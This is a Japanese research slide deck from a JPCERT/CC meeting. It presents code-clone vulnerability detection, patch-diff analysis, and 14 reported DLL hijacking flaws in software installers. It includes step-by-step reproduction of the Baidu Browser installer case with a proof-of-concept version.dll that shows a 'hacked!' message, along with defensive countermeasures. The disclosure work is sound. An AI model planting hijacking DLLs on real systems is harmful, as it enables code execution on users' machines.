[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性

Copyright©2018 NTT corp. All Rights Reserved.
活動紹介
研究紹介 + DLLハイジャックの脆弱性
日本電信電話株式会社
セキュアプラットフォーム研究所
中島明日香
JPCERT/CC POC Meeting

1Copyright©2018 NTT corp. All Rights Reserved.
自己紹介: 中島明日香
 情報セキュリティの研究開発
 脆弱性発見・対策技術がメイン (最近はIoT機器が対象)
 CTF for GIRLS 発起人
 2014年設立。女性限定CTFワークショップ & 大会を開催
 Black Hat Asia Review Board [査読者]
 世界最大級の産業系セキュリティ国際会議
 著書『サイバー攻撃』
 講談社ブルーバックス 1月発売

 [前半] 研究紹介
 コードクローンの脆弱性発見手法
 パッチ差分に基づく脆弱性修正箇所の特定支援技術
 [後半] DLLハイジャックの脆弱性を大量に発見した話
 DLLハイジャックの脆弱性を8月末に14個発見&報告
 脆弱性の詳細と経緯について
目次
公表済の脆弱性
CVE-2018-0692

研究紹介

研究紹介1：コードクローンの脆弱性発見手法
研究背景
ソフトウェア A
脆弱性
箇所
コピー
ソフトウェア B
コードクローンの脆弱性とは
コピー&ペーストソースコード共有フォークプロジェクト
ソース
コード A
ソース
コードB
Ctrl + C
Ctrl + V
オリジナルの脆弱性に対するパッチを基に、
コードクローンの脆弱性に対する攻撃コードが作成可能

1.逆アセンブル・正規化 2.類似度算出 3.脆弱性有無の判定
脆弱性が有る
実行ファイル
逆
ア
セ
ン
ブ
ル
＋
正
規
化
脆弱性箇所の
機械語命令列
push REG
mov REG REG
mov REG VAL
call MEM
・・・
検査対象実行
ファイルの
機械語命令列
mov REG REG
push REG
mov REG REG
push REG
push REG
mov REG MEM
mov REG MEM
lea REG MEM
・・・
検査対象
実行ファイル
■ 逆アセンブル概要図
■ 正規化
‣脆弱性がある実行ファイル
‣検査対象実行ファイル
‣コンパイル環境によって異なる
機械語(オペランド)が生成される
そのため正規化が必要
VAL
MEM
REG
即値
メモリの値
レジスタ
正規化前正規化後
mov eax ecx mov REG REG
発見手法について [1/3]

2.類似度算出 3.脆弱性有無の判定1.逆アセンブル・正規化
脆弱性箇所の
機械語命令列
push REG
mov REG REG
mov REG VAL
call MEM
・・・
検査対象実行ファイル
の機械語命令列
mov REG REG
push REG
mov REG REG
push REG
push REG
mov REG MEM
mov REG MEM
lea REG MEM
・・・
類似度算出
類似度
xx%
■ 類似度算出
動的計画法に基づいた類似文字列検索アルゴリズムを利用
‣Needleman-Wunsch (セミグローバル版)
‣アフィンギャップペナルティ (文字列の追加・削除部分の計算手法)
アルゴリズムを用いて算出したスコアを元に類似度を計算

push REG
mov REG REG
mov REG VAL
call MEM
・・・
push REG
mov REG REG
mov REG VAL
call MEM
・・・
mov REG REG
push REG
mov REG REG
push REG
push REG
mov REG MEM
mov REG MEM
lea REG MEM
・・・
脆弱性箇所の
機械語命令列
修正済み脆弱性
箇所の機械語命令列
類似度算出①
類似度算出②
類似度①：80%
類似度②：55%
脆弱性候補
抽出
検査対象実行ファイル
の機械語命令列
■ 脆弱性修正有無の判別手法
‣修正済み脆弱性箇所との類似度を算出
未修正の脆弱性箇所(類似度①)>修正済み脆弱性箇所(類似度②)の場合抽出
1.逆アセンブル・正規化 2.類似度算出 3.脆弱性有無の判定

CVE-ID オリジナルコピー類似度結果
CVE-2008-4250
netapi32.dll
(5.1.2600.2952)
netlogon.dll
(5.2.3790.1830)
37.7% 
CVE-2011-0658
oleaut32.dll
(5.2.3790.4202)
olepro32.dll
(6.1.7601.17514)
75.1% 
Deadcode
CVE-2015-1789
libeay32.dll
(0.9.8.31)
JunosPulseVpnBg.dll
(1.0.0.206)
43.9% 
CVE-2015-1793
libeay32.dll
(1.0.1.15)
JunosPulseVpnBg.dll
(1.0.0.206)
39.0% 
No attack vector
Windowsの脆弱性14個 + OpenSSLの脆弱性7個をテンプレとして利用
収集対象収集した実行ファイル数
Virus Total(NSRL) 7580
Windows XP 3479
Windows Vista 6933
Windows 7 5981
Windows8.1 5048
Windows Server 2003 3984
Windows Server 2008 7940
実験 & 結果
主にWindows中に存在する
実行ファイルを収集し、コードク
ローンの脆弱性が無いかを調査
■ 結果

 CVE-2008-4250
 【複製元】netapi32.dll 【複製先】netlogon32.dll
 BoF & Conficker Wormに利用されていた
修正の流れ
 netapi32.dllの修正パッチ [KB958644] 2008年10月配布
 netlogon32.dllの修正パッチ [KB961853] 2009年1月配布
 CVE-2015-1789
 【複製元】 libeay32.dll 【複製先】 JunosPulseVpnBg.dll
 Used by “Windows In-Box Junos Pulse Client(VPN Client)”※
修正の流れ
 OpenSSL(libeay32.dll)修正日 2015年6月
 実験でコードクローンの脆弱性を発見した日 2015年７月
 JunosPulseClient修正日 2015年8月
結果の詳細
※Windows In-Box Junos Pulse Client Quick Start Guide https://www.juniper.net/techpubs/software/pulse/guides/j-pulse-windows-inbox-client-qsg.pdf
パッチの配布に
3ヶ月の開きが存在！
修正前に発見！
CVE-2008-4250のケース
CVE-2015-1789のケース

研究紹介2：パッチ差分に基づく脆弱性修正箇所の特定支援
研究背景
 バイナリ比較ツールを用いた差分解析
 BinDiff
 Turbodiff
 脆弱性修正箇所特定支援技術
 DarunGrim
 手法：優先的に解析すべき差分箇所を提示
 例：cmp命令 +１点, strlen関数 +2点
 問題：開発者独自の知見に基づく特徴を利用しているため、網羅性に欠ける
既知の脆弱性箇所を特定したい場合、
脆弱性修正前後の差分解析(パッチ差分解析)が主流
実際の脆弱性修正の特徴を学習し、パッチ差分解析時に優先的に
解析すべき箇所を提示する脆弱性修正箇所特定支援技術の実現を検討
BinDiffによるパッチ差分解析

CVE-2014-0198
CVE-2015-0288
類似脆弱性の場合、その修正も類似する可能性が高い仮説
 脆弱性修正の特徴
- NULLポインタ参照の脆弱性
- ポインタがNULLか検査
仮説

 実験概要
 データセット：OpenSSL1.0.1の脆弱性修正パッチ 62個
 修正のためソースコードに追加や変更が生じた関数を対象に特徴を抽出
 分類手法：クラスタ分析手法 (階層的クラスタリング/ユークリッド距離)
 実験環境：OS:Ubuntu 14.04(x86版), コンパイラ:gcc 5.4.0
 特徴抽出の手順
脆弱性修正方法に共通となる特徴が存在するのか検証目的
脆弱性修正前
脆弱性修正後
正規化前正規化後正規化命令集合
① 出現命令集合の増分を抽出 ② 増分命令集合を正規化 ③ 正規化命令の出現頻度を集計
各命令の出現頻度増分命令集合
mov
mov
cmp
jne
test
je
push
jmp
lea
pop
…
mov
mov
cmp
jne
test
je
push
jmp
lea
pop
…
trans
trans
cmp
jump
cmp
jump
stack
jump
lea
stack
…
trans
trans
cmp
jump
cmp
jump
stack
jump
lea
stack
…
trans: 2
cmp: 2
jump: 3
stack:2
lea: 1
…
push
mov
sub
jmp
…
push
mov
sub
+ mov
+ mov
jmp
…
仮説検証

 分析：各脆弱性(CVE-ID)の概念を表すCWE-ID※をラベルとして付与
 結果：同じラベルが多く密集している２つのクラスタを発見
※直接CVE-IDに紐付いているCWE-IDでは無く、該当するCWE-IDを内包するルートCWE-IDを利用
Development View with Abstractions Highlighted, http://cwe.mitre.org/data/pdf/699_abstraction_colors.pdf
② ①クラスタ２
クラスタ１
検証結果

■クラスタ１の特徴
- CWE-19(データ処理)が密集
- 比較/分岐/算術命令が一定数以上存在
- 整数関連の値の検査が追加
■クラスタ２の特徴
- CWE-254(セキュリティ機能)
- 転送/分岐/関数に関する命令
- エラー処理用の関数が追加
脆弱性例：CVE-2016-0797
脆弱性例：CVE-2014-3470
パッチ毎に修正箇所の数に違いが存在。結果別クラスタとして分類された
結果詳細

資料
 中島明日香, 岩村誠, 矢田健, “機械語命令の類似度算出による複製さ
れた脆弱性の発見手法の提案” , コンピュータセキュリティシンポジ
ウム, 2015年10月
 https://ipsj.ixsq.nii.ac.jp/ej/index.php?active_action=repository_view_main_item_detail&page_
id=13&block_id=8&item_id=146833&item_no=1
 Asuka Nakajima “If You Find One, There are Probably More! A
Detection Method of “Reproduced” Vulnerability.”, Positive Hack
Days, May, 2016, Russia
 http://www.slideshare.net/phdays/ss-62579634
 パッチ差分に基づく脆弱性修正箇所特定支援技術
 中島明日香, 木村廉, 川古谷裕平, 岩村誠, 針生剛男
“パッチ差分に基づく脆弱性修正箇所の特定支援技術の検討”
マルチメディア，分散，協調とモバイル(DICOMO2017)シンポジウ
ム, 2017年6月 (ヤングリサーチャ賞受賞)
 https://ipsj.ixsq.nii.ac.jp/ej/index.php?active_action=repository_view_main_item_detail&page_
id=13&block_id=8&item_id=190132&item_no=1

DLLハイジャックの脆弱性を
大量に報告した話
14個！

背景 [1/2]
‣DLLの検索順序の仕様を考慮しない実装に起因
アプリケーションがDLL(共有ライブラリ)を読み込む際に、
開発者の意図せず任意(偽)のDLLが読み込まれてしまう脆弱性
DLLハイジャックの脆弱性とは(Windows環境)
‣CWE-427:Uncontrolled Search Path Element (制御されていない検索パスの要素)

0. “KnownDLLs”※に登録されているか否か
1. アプリケーションが読み込まれたディレクトリ
2. システムディレクトリ
3. 16ビットシステムディレクトリ
4. Windowsディレクトリ
5. カレントディレクトリ(CWD)
6. PATH環境変数に設定されているディレクトリ
【補足】DLLの検索パス [標準設定]
※一般的によく利用されるDLLは事前にパスがレジストリに
登録されている(原則system32)(※http://eternalwindows.jp/windevelop/dll/dll05.html)

 大量発見のきっかけ
 BlackHat USAで受講したトレーニング
 未知のDLLハイジャックの脆弱性を探せ！という課題
 「DLLハイジャックというと昔流行った？脆弱性な印象」
 ここ数年はインストーラを対象としたDLLハイジャックが流行
背景 [1/2]
勉強不足・・(ﾟωﾟ;A)

背景 [1/2]
勉強不足・・(ﾟωﾟ;A)

背景 [1/2]
勉強不足・・(ﾟωﾟ;A)インストーラを中心にバグハンティングしてみよう！

 結果
 見事脆弱性が見つかる！
背景 [2/2]

 結果
背景 [2/2]
先生! 脆弱性を見つけました！

 結果
背景 [2/2]
あ、本当だ。凄いね！

 結果
背景 [2/2]
ありがとうございます！(*￣∇￣*)
(一応本職?だし見つけられて良かった・・('A`;))

 結果
背景 [2/2]
しかもインストーラに着目するなんて
”今までに無い斬新な発想だ”!!

 結果
背景 [2/2]
しかもインストーラに着目するなんて
”今までに無い斬新な発想だ”!!
受講者の中でインストーラに着目して探している人は皆無
探せばまだまだ沢山あるのでは・・？

調査したインストーラ一覧 [1/2] ★が脆弱性として報告したもの
カテゴリソフトウェア名
ブラウザ
Safari
Firefox
Opera
Chrome
Lunascape Phoebe
Tor Browser
Seamonkey
Sleipnir
Yandex Browser
Vivaldi
Waterfox
★Baidu Browser (公表済)
★ XXX
★ XXX
メディア
プレーヤ
GOM Player
DivX
VLC
MPC-HC
★ XXX
★ XXX
★ XXX
★ XXX
バイナリ
エディタ
010 Editor
HxD
Strling
Winhex
Ultra Edit
★ XXX
オフィス
系
Libre Office
Open Office
Free Office
Poralis Office
一太郎(試用版)
★ XXX
メーラ
ベッキー
秀丸メール
Opera Mail
Thunderbird
画像
ビューア
IrfanView
XnView
Honeyview
NexusImage
Imagine
ImageGlass
★XXX
テキスト
エディタ
Atom
Sakura
terapad
sublimetext
秀丸
brackets
Notpad++
Microsoft OneNote
Evernote
チャット
IRC等
Skype
Limechat
BoldChat
LiveChat
Line
pidgin
★ XXX
★ XXX
セキュリ
ティソフト
等
Wireshark
Kaspersky secure
Connection
Virustotal windows uploader
McAfee Ransomware
Decryption
McAfee Security Scan Plus
Malwarebytes
Avast
AVG(体験版)
★XXX

PDF閲覧
ソフト等
Kindle
Foxit
Adobe Reader
Slimpdf
Smatra PDF
PDF-Xchange Viewer
★ XXX
その他
Spotify
Audacity
Kindle for PC
BitTorrent
NETGEARGenie
TeraTerm
cybozu Desktop
LEGO Digital Designer
Blender
FileZilla
iCloud
Dropbox Installer
ImageMagick
その他
Virtual Box
GIMP
Visual Studio Community 2017
Vmware WorkStation 12
Lhaca デラックス版
Jane Style(5ch専用ブラウザ)
git for windows
Inkscape
Unity(Download Assistant)
合計14個の脆弱性を報告
中にはユーザ数800万人の
ソフトウェアにも
調査したインストーラ一覧 [2/2] ★が脆弱性として報告したもの (匿名化済み)

Baidu Browser の場合：
再現手順 [1/3]
1 インストーラ(BaiduBrowser_MiniDownloader.exe)
が利用するDLLの種類を確認
CFF Explorerで確認
2
手元の環境にてKnownDLLsとして登録されているDLLを、
cmd.exe経由で下記コマンドにて確認する
reg query "hklmsystemcurrentcontrolsetcontrolsession
managerknowndlls“
_wow64 REG_SZ wow64.dll
-中略-
WLDAP32 REG_SZ WLDAP32.dll
WS2_32 REG_SZ WS2_32.dll
インストーラが利用していてかつ
KnownDLLsでは無いDLLを探す

再現手順 [2/3]
3 ステップ2,3から、インストーラが読み込んでいる
version.dllはKnownDLLsでは無い事が判明
そこでこのversion.dllを用いてDLLハイジャックを行う
※他にもKnownDLLsで無いものがあるが、今回はversion.dllで検証
4 実際にDLLハイジャックを行うための偽のDLL
(version.dll)を用意する

再現手順 [3/3] #include “stdafx.h”
void showMessage() {
MessageBox(0,
TEXT(“hacked!”),
TEXT(“code injected!”),
MB_OK);
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved){
switch (ul_reason_for_call){
case DLL_PROCESS_ATTACH:
showMessage();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
POC(version.dll)
5 右図の様なDLLを準備
(コンパイル)しversion.dll
と名づける(※補足)
※また検証ではオリジナルのversion.dllが持つエクスポート関数を、
オリジナルのdll(version_orig.dll)に転送するための機能を持たせた
6 インストーラと同一の
ディレクトリにversion.dll
(+version_orig.dll)を配置する
7 インストーラを実行すると
「hacked!」というメッセージが表示され、
DLLハイジャックが成功したことが確認できる

Baidu Browserの場合 : デモ動画
 デモ動画

0. “KnownDLLs”※に登録されているか否か
1. アプリケーションが読み込まれたディレクトリ (アプリケーションディレクトリ型)
2. システムディレクトリ
3. 16ビットシステムディレクトリ
4. Windowsディレクトリ
5. カレントディレクトリ(CWD) (カレントディレクトリ型)
6. PATH環境変数に設定されているディレクトリ
【補足】DLLハイジャックの脆弱性の種類
[再掲] DLLの検索パス
 流行の変遷
 2010年頃はカレントディレクトリ型が流行
 例：Wordの文書(docx)を開いた場所からDLLが読み込まれる
 最近はアプリケーションディレクトリ型が流行
 例：インストーラがダウンロードされた場所からDLLが読み込まれる

 研究紹介
 パッチ差分に基づく脆弱性修正箇所の特定支援技術
 DLLハイジャックの脆弱性を大量発見した話
 発見・対策手法についての参考文献
 「DLL読み込みの問題を読み解く」 (JPCERT/CC)
 https://www.slideshare.net/jpcert_securecoding/dll-78581339
 DLL プリロード攻撃を防止するためのライブラリの安全な読み込み(MS)
 https://support.microsoft.com/ja-jp/help/2389418/secure-loading-of-
libraries-to-prevent-dll-preloading-attacks
 対策手法について
 [ユーザ] 怪しいファイルがある所でインストーラを実行しない
 [開発者] DLLの読み込みの仕様に注意して開発
脆弱性があるインストーラ作成ソフトを使わない
まとめ

ご清聴ありがとうございました

[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性

Recommandé

Recommandé

Contenu connexe

Tendances

Tendances (20)

Similaire à [JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性

Similaire à [JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性 (20)

Plus de Asuka Nakajima

Plus de Asuka Nakajima (7)

[JPCERT/CC POC Meeting] 研究紹介 + DLLハイジャックの脆弱性